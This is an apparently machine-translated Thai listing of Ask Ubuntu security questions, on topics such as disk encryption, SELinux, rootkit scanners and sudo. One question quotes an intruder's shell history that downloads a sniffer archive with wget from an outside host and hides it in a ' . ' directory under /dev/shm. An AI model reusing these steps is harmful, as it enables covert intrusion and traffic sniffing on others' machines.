คำถามติดแท็ก security

การรักษาความปลอดภัยครอบคลุมหัวข้อที่หลากหลายเช่นผู้ใช้การอนุญาตการตรวจสอบสิทธิ์การอัปเกรดไฟร์วอลล์การชุบแข็งและอื่น ๆ


2
Yubikey การรับรองความถูกต้องด้วยสองปัจจัยการเข้ารหัสดิสก์เต็มรูปแบบผ่าน LUKS
ฉันเพิ่งได้รับ Yubikey Neo - อุปกรณ์การรับรองความถูกต้องของฮาร์ดแวร์ตัวที่สอง ส่วนใหญ่มีไว้สำหรับใช้กับรหัสผ่านแบบครั้งเดียวและโปรโตคอล U2F ที่เกิดขึ้นใหม่ แต่เนื่องจาก Yubikey เวอร์ชัน 2 นั้นยังรองรับการตรวจสอบความถูกต้องตอบสนองความท้าทาย HMAC-SHA1 HMAC-SHA1 รวมคีย์ลับ (เก็บไว้ใน Yubikey) และรวมสิ่งนี้กับวลีรหัสผ่านเพื่อสร้างการตอบกลับ ฉันจะรวม Yubikey กับการตั้งค่า Ubuntu FDE ของฉันเพื่อใช้ 2FA กับฮาร์ดไดรฟ์ที่เข้ารหัสของฉันได้อย่างไร

2
เป็นความคิดที่ดีหรือไม่ที่จะเรียกใช้ SELinux และ AppArmor ในเวลาเดียวกัน?
นโยบายองค์กรของฉันบอกว่ากล่อง Linux ต้องปลอดภัยด้วย SELinux (เพื่อให้ผู้ตรวจสอบความปลอดภัยสามารถตรวจสอบช่องทำเครื่องหมาย 'ใช่เรามีความปลอดภัยมาก!' สำหรับแต่ละเซิร์ฟเวอร์) ฉันหวังว่าจะใช้ประโยชน์จากความปลอดภัย AppArmor ที่เป็นค่าเริ่มต้นของ Ubuntu มันไม่ฉลาดเลยที่จะเรียกใช้ทั้ง Apparmor และ SELinux? (ถ้าเป็นเช่นนั้นความคิดที่ไม่ดีนี้จะสามารถลดลงด้วย apparmor และ / หรือปรับแต่ง selinux?)

3
ฉันต้องใช้ Livepatch มาตรฐานหรือไม่
Ubuntu บอกว่า ใช้ canonical Livepatch เพื่อเพิ่มความปลอดภัยระหว่างการรีสตาร์ท ฉันต้องลงชื่อเข้าใช้เพื่อทำสิ่งนี้ดังนั้นควรตั้งค่าหรือไม่ ฉันไม่แน่ใจว่ามันคืออะไร; กล่องนั้นไม่ถูกต้อง ฉันถามเพื่อนที่มีความรู้ด้านไอที แต่เขาไม่รู้ ยิ่งมีความปลอดภัยมากเท่าไหร่ก็ยิ่งดี แต่มันก็คุ้มค่าแล้วมันซับซ้อนแค่ไหน? (ฉันใหม่กับ Kubuntu มันเป็นกระบวนการเรียนรู้)

6
คอมพิวเตอร์ส่วนบุคคลถูกแฮ็ค: ฉันจะบล็อกผู้ใช้นี้ไม่ให้เข้าสู่ระบบอีกครั้งได้อย่างไร ฉันจะรู้ได้อย่างไรว่าพวกเขากำลังเข้าสู่ระบบ?
ฉันมั่นใจว่า 99.9% ว่าระบบของฉันในคอมพิวเตอร์ส่วนบุคคลของฉันถูกแทรกซึม อนุญาตให้ฉันให้เหตุผลก่อนเพื่อสถานการณ์จะชัดเจน: ไทม์ไลน์ของกิจกรรมที่น่าสงสัยและการกระทำที่ตามมาที่เกิดขึ้น: 4-26 23:00 ฉันสิ้นสุดโปรแกรมทั้งหมดและปิดแล็ปท็อปของฉัน 4-27 12:00 ฉันเปิดแล็ปท็อปหลังจากที่อยู่ในโหมด Suspend เป็นเวลาประมาณ 13 ชั่วโมง มีหลายหน้าต่างที่เปิดอยู่รวมถึง: หน้าต่าง Chrome สองชุดการตั้งค่าระบบศูนย์ซอฟต์แวร์ บนเดสก์ท็อปของฉันมีตัวติดตั้ง git (ฉันตรวจสอบแล้วยังไม่ได้ติดตั้ง) 4-27 13:00 ประวัติ Chrome แสดงการเข้าสู่ระบบอีเมลของฉันและประวัติการค้นหาอื่น ๆ ที่ฉันไม่ได้เริ่มต้น (ระหว่าง 01:00 น. ถึง 03:00 น. ในวันที่ 4-27) รวมถึง "การติดตั้ง git" มีแท็บ Digital Ocean "วิธีกำหนด bash prompt ของคุณ" เปิดในเบราว์เซอร์ของฉัน มันเปิดใหม่หลายครั้งหลังจากที่ฉันปิดมัน ฉันเข้มงวดเรื่องความปลอดภัยใน …

4
chkrootkit แสดง“ tcpd” เป็น INFECTED มันเป็นบวกที่ผิดพลาดหรือไม่?
สแกนโดย chkrootkit แสดงให้เห็นว่า "tcpd" เป็น INFECTED แม้ว่าการสแกนโดย rkhunter จะแสดงว่า ok (ยกเว้นผลบวกผิดปกติ) ฉันจะเป็นห่วงไหม? (ฉันใช้ Ubuntu 16.10 กับ 4.8.0-37-generic)

5
รหัสผ่าน sudo สำคัญอย่างไร
ฉันรู้ว่ารหัสผ่าน sudo ปกป้องคอมพิวเตอร์ของฉันจากการถูกแฮ็กในเครื่องโดยผู้ที่สามารถเข้าถึงได้ ( แก้ไข:จริง ๆ แล้วมันไม่ได้ ) รหัสผ่านของฉันแรงพอสำหรับจุดประสงค์นั้น แต่ฉันรู้ว่ามันไม่แรงพอถ้าใครบางคนสามารถเดรัจฉานบังคับได้จากระยะไกล ใครสามารถเข้าถึงคอมพิวเตอร์ของฉันในโหมดรูทโดยใช้รหัสผ่าน sudo โดยไม่ต้องใช้คอมพิวเตอร์ในการติดตั้ง Ubuntu บนเดสก์ท็อปมาตรฐาน หากคุณมีการเข้าถึงเครือข่ายแน่นอนใช่ (คำตอบสั้น ๆ ) หากคุณไม่ใส่ใจกับความปลอดภัยอย่างเพียงพอใช่ (ตอบยาว) หากคุณมี "SSH" ทำงานและไม่มี2FA , ใช่ ( ความเห็นและคำตอบ) หนึ่งสามารถเข้าถึงคอมพิวเตอร์ของคุณเป็น root โดยไม่ต้องใช้รหัสผ่าน sudo / ผู้ใช้

6
ฉันจะยืนยันได้อย่างไรว่าไบนารีในอูบุนตูของฉันนั้นมาจากซอร์สโค้ดที่ควรจะเป็น
เช่นเดียวกับผู้ใช้ 99% ฉันติดตั้ง Ubuntu จากไบนารีสำเร็จรูป ฉันจะตรวจสอบตัวเองว่าไบนารีนั้นมาจากซอร์สโค้ดต้นฉบับจาก Ubuntu ได้อย่างไร มันเป็นการดีที่จะตรวจสอบว่า NSA / บางคนไม่ได้ร่วมมือกับ Ubuntu หรือ Linode (ผู้ให้บริการ VPS ของฉัน) เพื่อยุ่งกับไบนารี หากเราสามารถตรวจสอบความถูกต้องของไบนารีพวกเขาก็ไม่น่าจะลองสิ่งนี้ตั้งแต่แรกเพราะมันง่ายที่จะเรียกพวกมันออกมา
25 security 

5
มีไฟร์วอลล์ที่ติดตั้งไว้ล่วงหน้าหรืออัตโนมัติหรือไม่
Ubuntu มาพร้อมกับไฟร์วอลล์ที่ติดตั้งไว้ล่วงหน้าหรืออัตโนมัติหรือไม่ ถ้าไม่ฉันจำเป็นต้องใช้หรือไม่ ฉันได้อ่านบทความบางอย่างเกี่ยวกับข้อดีของ Linux บนระบบปฏิบัติการอื่น ๆ เกี่ยวกับความปลอดภัย (ไม่จำเป็นต้องมีโปรแกรมป้องกันไวรัส ... ) แต่อยากจะแน่ใจ

1
rkhunter เตือนเกี่ยวกับ /etc/.java /etc/.udev /etc/.initramfs
ฉันใช้ Ubuntu 10.04.1 LTS ฉันกำลังเรียกใช้rkhunterเพื่อตรวจสอบรูทคิท rkhunter กำลังบ่นเกี่ยวกับไฟล์และไดเรกทอรีที่ซ่อนอยู่ดังต่อไปนี้ ฉันคิดว่าไฟล์เหล่านี้ไม่ใช่ปัญหาจริงในระบบของฉัน แต่ฉันจะตรวจสอบเพื่อดูว่าไฟล์เหล่านี้เป็นไฟล์ที่ถูกกฎหมายได้อย่างไร [07:57:45] Checking for hidden files and directories [ Warning ] [07:57:45] Warning: Hidden directory found: /etc/.java [07:57:45] Warning: Hidden directory found: /dev/.udev [07:57:45] Warning: Hidden directory found: /dev/.initramfs ปรับปรุง ปรากฎว่าไดเรกทอรีเหล่านี้จะกล่าวถึงเฉพาะใน /etc/rkhunter.conf ซึ่งแสดงให้เห็นว่านี่เป็นคำถาม rkhunter ที่ถามบ่อย จาก rkhunter.conf: # # Allow the specified …

2
พบ SSH Backdoor บน VServer จะทำอย่างไร?
เมื่อวานนี้ฉันตรวจสอบประวัติคำสั่งของฉันใน VServer ของฉัน ฉันพบหลายสายที่น่าสงสัย 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget aridan.hol.es/sniffer.tgz 206 tar xvf ar 207 tar …
24 ssh  security  malware 

2
การอัพเกรด meta-release (do-release-upgrade) ปลอดภัยหรือไม่?
ฉันพยายามทำความเข้าใจกับdo-release-upgradeกระบวนการเช่นวิธีที่ Ubuntu แจ้งให้ฉันอัพเกรดเป็นรุ่นถัดไปของ Ubuntu หรือฤดูใบไม้ร่วงของ Ubuntu หลังจากอ่านแหล่งข้อมูลสำหรับubuntu-release-upgraderฉันพบไฟล์/ etc / update-manager / meta-releaseบนระบบของฉัน ไฟล์นี้ใช้ HTTP URL ชี้ไปที่http://changelogs.ubuntu.com/meta-releaseซึ่งมี Ubuntu เผยแพร่หลายรุ่นตั้งแต่ Warty 04.10 ถึง Raring 13.04 ไฟล์นี้แสดงรายการรุ่น, สถานะการสนับสนุน, วันที่วางจำหน่ายและมีลิงค์ไปยังReleaseไฟล์ ตอนนี้Releaseไฟล์นั้นมีลายเซ็น GPG ที่เกี่ยวข้องและ sha1sum ของPackagesไฟล์ซึ่งในทางกลับกันก็มี sha1sum ของไบนารี DEB แต่ละรายการที่ได้รับการติดตั้ง รุ่นล่าสุดยังมีสคริปต์อัปเกรดและลายเซ็น GPG ที่สอดคล้องกันสำหรับสิ่งเหล่านี้ด้วย ทุกอย่างฟังดูดี คำถามของฉันเกี่ยวกับmeta-releaseไฟล์นั้น มันไม่ได้แสดงผ่าน HTTPS และฉันไม่สามารถหาลายเซ็น GPG ได้ หากมีคนแทนที่ไฟล์นี้พวกเขาอาจทำให้เครื่องของฉันอัพเกรด ... ... สู่รีลีสที่ลงนามแล้วซึ่งยังไม่ผ่านการทดสอบความปลอดภัย? ... …


2
ระบบรักษาความปลอดภัยอย่างไร?
ฉันเข้าใจว่าหากมัลแวร์ใด ๆ เข้ามาในระบบ Linux แล้วส่วนใหญ่จะได้รับสิทธิ์ระดับผู้ใช้และทำลายสิ่งใดก็ตามที่ผู้ใช้เข้าถึงได้เช่นแฟ้มของผู้ใช้ แต่สิ่งที่ทำให้มัลแวร์ป้องกันการเข้าถึงระดับรากได้อย่างแน่นอน? ไม่สามารถถอดรหัสรหัสผ่านจากภายในได้หรือไม่?
24 security 

2
apt เทียบเท่ากับ“ rpm -V” คืออะไร (ตรวจสอบแพ็คเกจที่ติดตั้งไว้)
บนระบบ RedHat / CentOS ผมสามารถตรวจสอบ RPM ที่ติดตั้งในระบบของฉันโดยใช้รอบต่อนาที -V อูบุนตูหรือaptคำสั่งนี้เทียบเท่าคืออะไร?
24 security  apt  rpm  deb 

โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.